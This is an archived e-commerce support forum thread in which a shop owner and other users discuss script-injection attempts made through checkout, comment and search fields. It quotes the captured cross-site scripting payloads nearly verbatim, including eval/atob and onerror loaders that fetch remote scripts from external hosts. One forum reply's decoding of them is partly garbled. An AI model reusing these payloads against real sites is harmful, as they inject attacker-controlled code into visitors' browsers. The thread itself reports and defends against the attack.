Guest Posted January 8, 2019 Share Posted January 8, 2019 Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually): Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_ Ithaca Ithaca, New York 98765 United States I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable: A message that you sent contained one or more recipient addresses that were incorrectly constructed: "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<") This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible. Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks! - Andrea Link to comment Share on other sites More sharing options...
♥JcMagpie Posted January 8, 2019 Share Posted January 8, 2019 Yes it's quite simple they are trying to get you to save this to your db. They know if they use your form and finish osC will save to db and that is what they do to get into the db. You should deleat the account and clear the crap from the db. What they were trying to do? Who knows! Link to comment Share on other sites More sharing options...
Guest Posted January 8, 2019 Share Posted January 8, 2019 18 minutes ago, JcMagpie said: clear the crap from the db. Can you be a little more specific? I deleted the order - no account existed. I found some interesting info online when searching a bit deeper. The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. Google the phrase Linda Juan Fraud and see what comes up. Guess it was just my turn! Hope they send cash... - Andrea Link to comment Share on other sites More sharing options...
ArtcoInc Posted January 8, 2019 Share Posted January 8, 2019 @puggybelle As I understand it, osC has filters in place to prevent 'customers' from entering injection code when filling out forms. You did say that you are using PWA. While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code. That said, IIRC, the latest version of PWA is supposed to delete any customer record after the 'guest' checks out. I'm pretty sure that's why no 'customer' account exists. M Link to comment Share on other sites More sharing options...
♥raiwa Posted January 8, 2019 Share Posted January 8, 2019 16 minutes ago, ArtcoInc said: While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code. PWA uses exact the same coding which sanitizes customer input to store the customers data in the database like the core create account page. So it is as save as the core create account in that sense. About Me: http://www.oscommerce.com/forums/user/249059-raiwa/ Need help? How To Get The Help You Need Is your version of osC up to date? You'll find the latest osC community version CE Phoenix here. Public Phoenix Change Log Cheat Set on Google Sheets Link to comment Share on other sites More sharing options...
ArtcoInc Posted January 8, 2019 Share Posted January 8, 2019 @raiwa Thank you for that clarification. Can you explain then how the injection code ended up in the orders record? Or, is that an issue with her version of osC not sanitizing the customer input in the orders record? M Link to comment Share on other sites More sharing options...
Guest Posted January 8, 2019 Share Posted January 8, 2019 I always forget to say which version I'm using. I'm using 2.3.4.1 CE with the latest version of PWA. - Andrea Link to comment Share on other sites More sharing options...
ArtcoInc Posted January 8, 2019 Share Posted January 8, 2019 @puggybelle Unfortunately, the Community Edition version of osC does not have an accurate version number system. Do you know if you are using 'Frozen'? Or a version or 'Edge'? The only way to really know which version you have is to look at the date of the original code package. M Link to comment Share on other sites More sharing options...
Guest Posted January 8, 2019 Share Posted January 8, 2019 @ArtcoInc I downloaded a package that is dated May 24, 2018 called Responsive - osCommerce - master - Andrea Link to comment Share on other sites More sharing options...
ArtcoInc Posted January 8, 2019 Share Posted January 8, 2019 FWIW, 'Frozen' was released on Aug 31, 2018. Additional work continues to be done under the 'Edge' name. M Link to comment Share on other sites More sharing options...
Guest Posted January 8, 2019 Share Posted January 8, 2019 Is there anything I need to do? When I run Version Checker in Admin, it comes back with: - Andrea Link to comment Share on other sites More sharing options...
ArtcoInc Posted January 8, 2019 Share Posted January 8, 2019 @puggybelle (while off topic ...) As I said, the Community Edition does not have an accurate version numbering system. When Burt started this project back in 2014, osC was at version 2.3.3.4. So, the Community Edition, all through its early development, was also v2.3.3.4. Every release during these early times was called v2.3.3.4. When osC upgraded to v2.3.4, Burt brought the Community Edition code base up to the v2.3.4 code base, and the Community Edition stayed at v2.3.4 while further development was happening. Somewhere during this time, Burt released the 'Gold' fixed release. Development still continued, with every release still being called v2.3.4. When osC had the v2.3.4.1 Hot Patch applied, Burt also applied the Hot Patch, and the Community Edition was bumped up to v2.3.4.1. Once again, development continued, with every new release still being called v2.3.4.1. Burt released the 'Frozen' fixed release in August, 2018. Development still continues (usually called 'Edge', although that is not a fixed release), and the version number is *still* v2.3.4.1. Some bugs have been identified in 'Frozen', and there is a thread here on the forum identifying them (and some fixes too). 'Edge' continues to be developed (still being called v2.3.4.1), and some significant changes have been made since 'Frozen', causing some compatibility issues with prior versions, and many (most?) add-ons out there. This all said ... You can download the 'Frozen' version (see the link in my signature below). *** IF *** you have made NO core changes, you *should* be able to drop the 'Frozen' version into your store. Otherwise, you will need to use a file compare application to see what changes have been made since your release. (now, to get back on topic ...) How this all relates to your initial problem, I don't know. Someone with a higher pay grade than myself will need to explore how the injection code made its way into your orders record. M Link to comment Share on other sites More sharing options...
Jack_mcs Posted January 9, 2019 Share Posted January 9, 2019 6 hours ago, puggybelle said: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC When the form is submitted, the commands are stripped from it. That is why you see the __script instead of <script. That renders the code useless as far as the hacker is concerned. At least it should. I never assume anything when they are involved. If you have an addon that records the IP, like View Counter or IP Blocker, then you should block the IP. That won't prevent others from using the same method but it might stop that guy. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Guest Posted January 9, 2019 Share Posted January 9, 2019 @ArtcoInc Well, this is just a mess! My core code has been modified substantially, so...I have a lot to think about now. But, Thank You for helping! @Jack_mcs Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form. The part where buyers can add any additional comments with their purchase. But, the < > tags have been stripped. Looks like this: _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_ It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. I bet someone in this forum knows... I will take comfort in knowing that the code is being sanitized and just leave it at that. This hacker nonsense is crazy and worse then ever. Thanks to everyone who posted - I appreciate it very much! - Andrea Link to comment Share on other sites More sharing options...
♥JcMagpie Posted January 9, 2019 Share Posted January 9, 2019 I would say you still need to clean your db of any remnents of the injected script. The sanitiser is not 100%! hackers know how this is done and add redundent characters to fool it. manualy clean the db then run virus scaner on the server if you can or tell your host the script has been injected. You "MAY" have to restore db and/or site from backups before the injection if they find it has spread. Link to comment Share on other sites More sharing options...
MrPhil Posted January 9, 2019 Share Posted January 9, 2019 This is only appearing in this one order's data, and is not in everyone's (or in your osC code)? They are definitely trying to provoke your server into running what's presumably some nasty script code, but it's being disabled by osC. If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit. Unless you want to jump through the hoops of reporting them to the payment processor. If everyone is seeing this, you've got some cleanup to do and security holes to patch. They're trying to inject and run some script code that creates more script, invisible images, and input field elements on your page. Some server in Guyana (they have computers there???) is involved (perhaps to load more malicious code). I haven't dived more deeply into it, but it looks like something you don't want running. Just be thankful it was (apparently) disabled before it could do the nasty. Link to comment Share on other sites More sharing options...
Jack_mcs Posted January 9, 2019 Share Posted January 9, 2019 13 hours ago, puggybelle said: t'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. The jb.gy is a link to the hacker site. The gy is the TLD for Guyana. Once the full code is in your database, the hacker could access and load whatever from his site. If your host offers country blocking, or if you have View Counter installed, then you should block Guyana, assuming you would not sell to anyone from there, along with any other country you won't sell to. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
♥JcMagpie Posted January 9, 2019 Share Posted January 9, 2019 I'm not so sure the script was stopped! Decoding what @puggybelle posted most of it looks untouched and may still be active. If I decoded correctly and it looks as if it did I get, _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var=document.createElement("script");b.src="http://jb.gy/"+Math.random();(document.getElementsByTagName("HEAD")[]||document.body).appendChild();/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_ As you see most of the hexadecimal was left un striped and works. I think its active and still valid and will need to be roooted out of the site, but I could be wrong! you can never be sure about these bits of *~##ity scripts. Link to comment Share on other sites More sharing options...
Guest Posted January 10, 2019 Share Posted January 10, 2019 12 hours ago, MrPhil said: If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit They checked out using the checks/money order selection so no worries about payment or delivery. And I sincerely hope that this is a one-off thing and all will be well. I have contacted my webhost with full details and am awaiting a response now. Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it. This crap is really scary, you know? 3 hours ago, JcMagpie said: I think its active and still valid and will need to be roooted out of the site, but I could be wrong! Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now. I haven't the faintest idea how to go about manually cleaning the database. Hopefully, they'll find nothing and I can forget about it. 10 hours ago, Jack_mcs said: If your host offers country blocking, or if you have View Counter installed, then you should block Guyana, My host does NOT offer country blocking. I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter. In retrospect, it should have been the other way around. I now use Ultimate SEO URLs. Live and learn, I guess. I'll post back with any response I get from the webhost. Hopefully, everything is okay. Thanks all! - Andrea Link to comment Share on other sites More sharing options...
Guest Posted January 10, 2019 Share Posted January 10, 2019 Okay, here's where I'm at. Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them. No new files had been added to the website. And just encouragement to upgrade my installation to the 'frozen' version, I think it's called. And that's what I thought I had! Oh, well. Work to do but it didn't turn out to be a disaster. Think I will give View Counter another look, though... If I have to block half the world, I'll do it! Thanks everybody! - Andrea Link to comment Share on other sites More sharing options...
shery19 Posted April 22, 2019 Share Posted April 22, 2019 If you often visit unknown sites, I recommend then to use a VPN software for your security, because your private data can be stolen in any moment. Link to comment Share on other sites More sharing options...
pete2007 Posted May 6, 2019 Share Posted May 6, 2019 On 1/8/2019 at 6:00 PM, puggybelle said: Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually): Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_ Ithaca Ithaca, New York 98765 United States I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable: A message that you sent contained one or more recipient addresses that were incorrectly constructed: "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<") This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible. Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks! - Andrea I had a similar incident, where someone created an account with a script, no order was placed tho... but after doing checks nothing seems to have been changed, think I've been let off this time... Would you suggest using website security/firewall like siteguarding or sucuri would help prevent future issues like this? Thank you in advance. Link to comment Share on other sites More sharing options...
Jack_mcs Posted May 6, 2019 Share Posted May 6, 2019 15 minutes ago, pete2007 said: On 1/8/2019 at 1:00 PM, puggybelle said: I had a similar incident, where someone created an account with a script, no order was placed tho It's a very common thing for all database sites. See this thread for suggestions. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Guest Posted May 18, 2019 Share Posted May 18, 2019 I want to report that I had another hack attempt this week - this time, thru the Search box. Apparently, there's no limit to what can be entered in the search field. I use an old contrib that I cleaned up called Keyword Search Report and when I looked at it yesterday, it was hysterical. Huge chunks of malicious code. Wish I had taken a screenshot of it, but I was so ticked off I immediately deleted the report and checked the database. I have since edited all files containing the Search form and put a maxlength="60" in all of them. catalog > advanced_search.php catalog > includes > modules > boxes>bm_search.php catalog > includes > modules>content > header>cm_header_search.php If I'm missing something, please let me know. This hacker crap is insane! - Andrea Link to comment Share on other sites More sharing options...
greasemonkey Posted May 18, 2019 Share Posted May 18, 2019 9 minutes ago, puggybelle said: Huge chunks of malicious code. Sorry? Where were these huge chunks of code??????? If the code was in a file on your server - you have a HUGE issue... that is nothing to do with the file its self. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.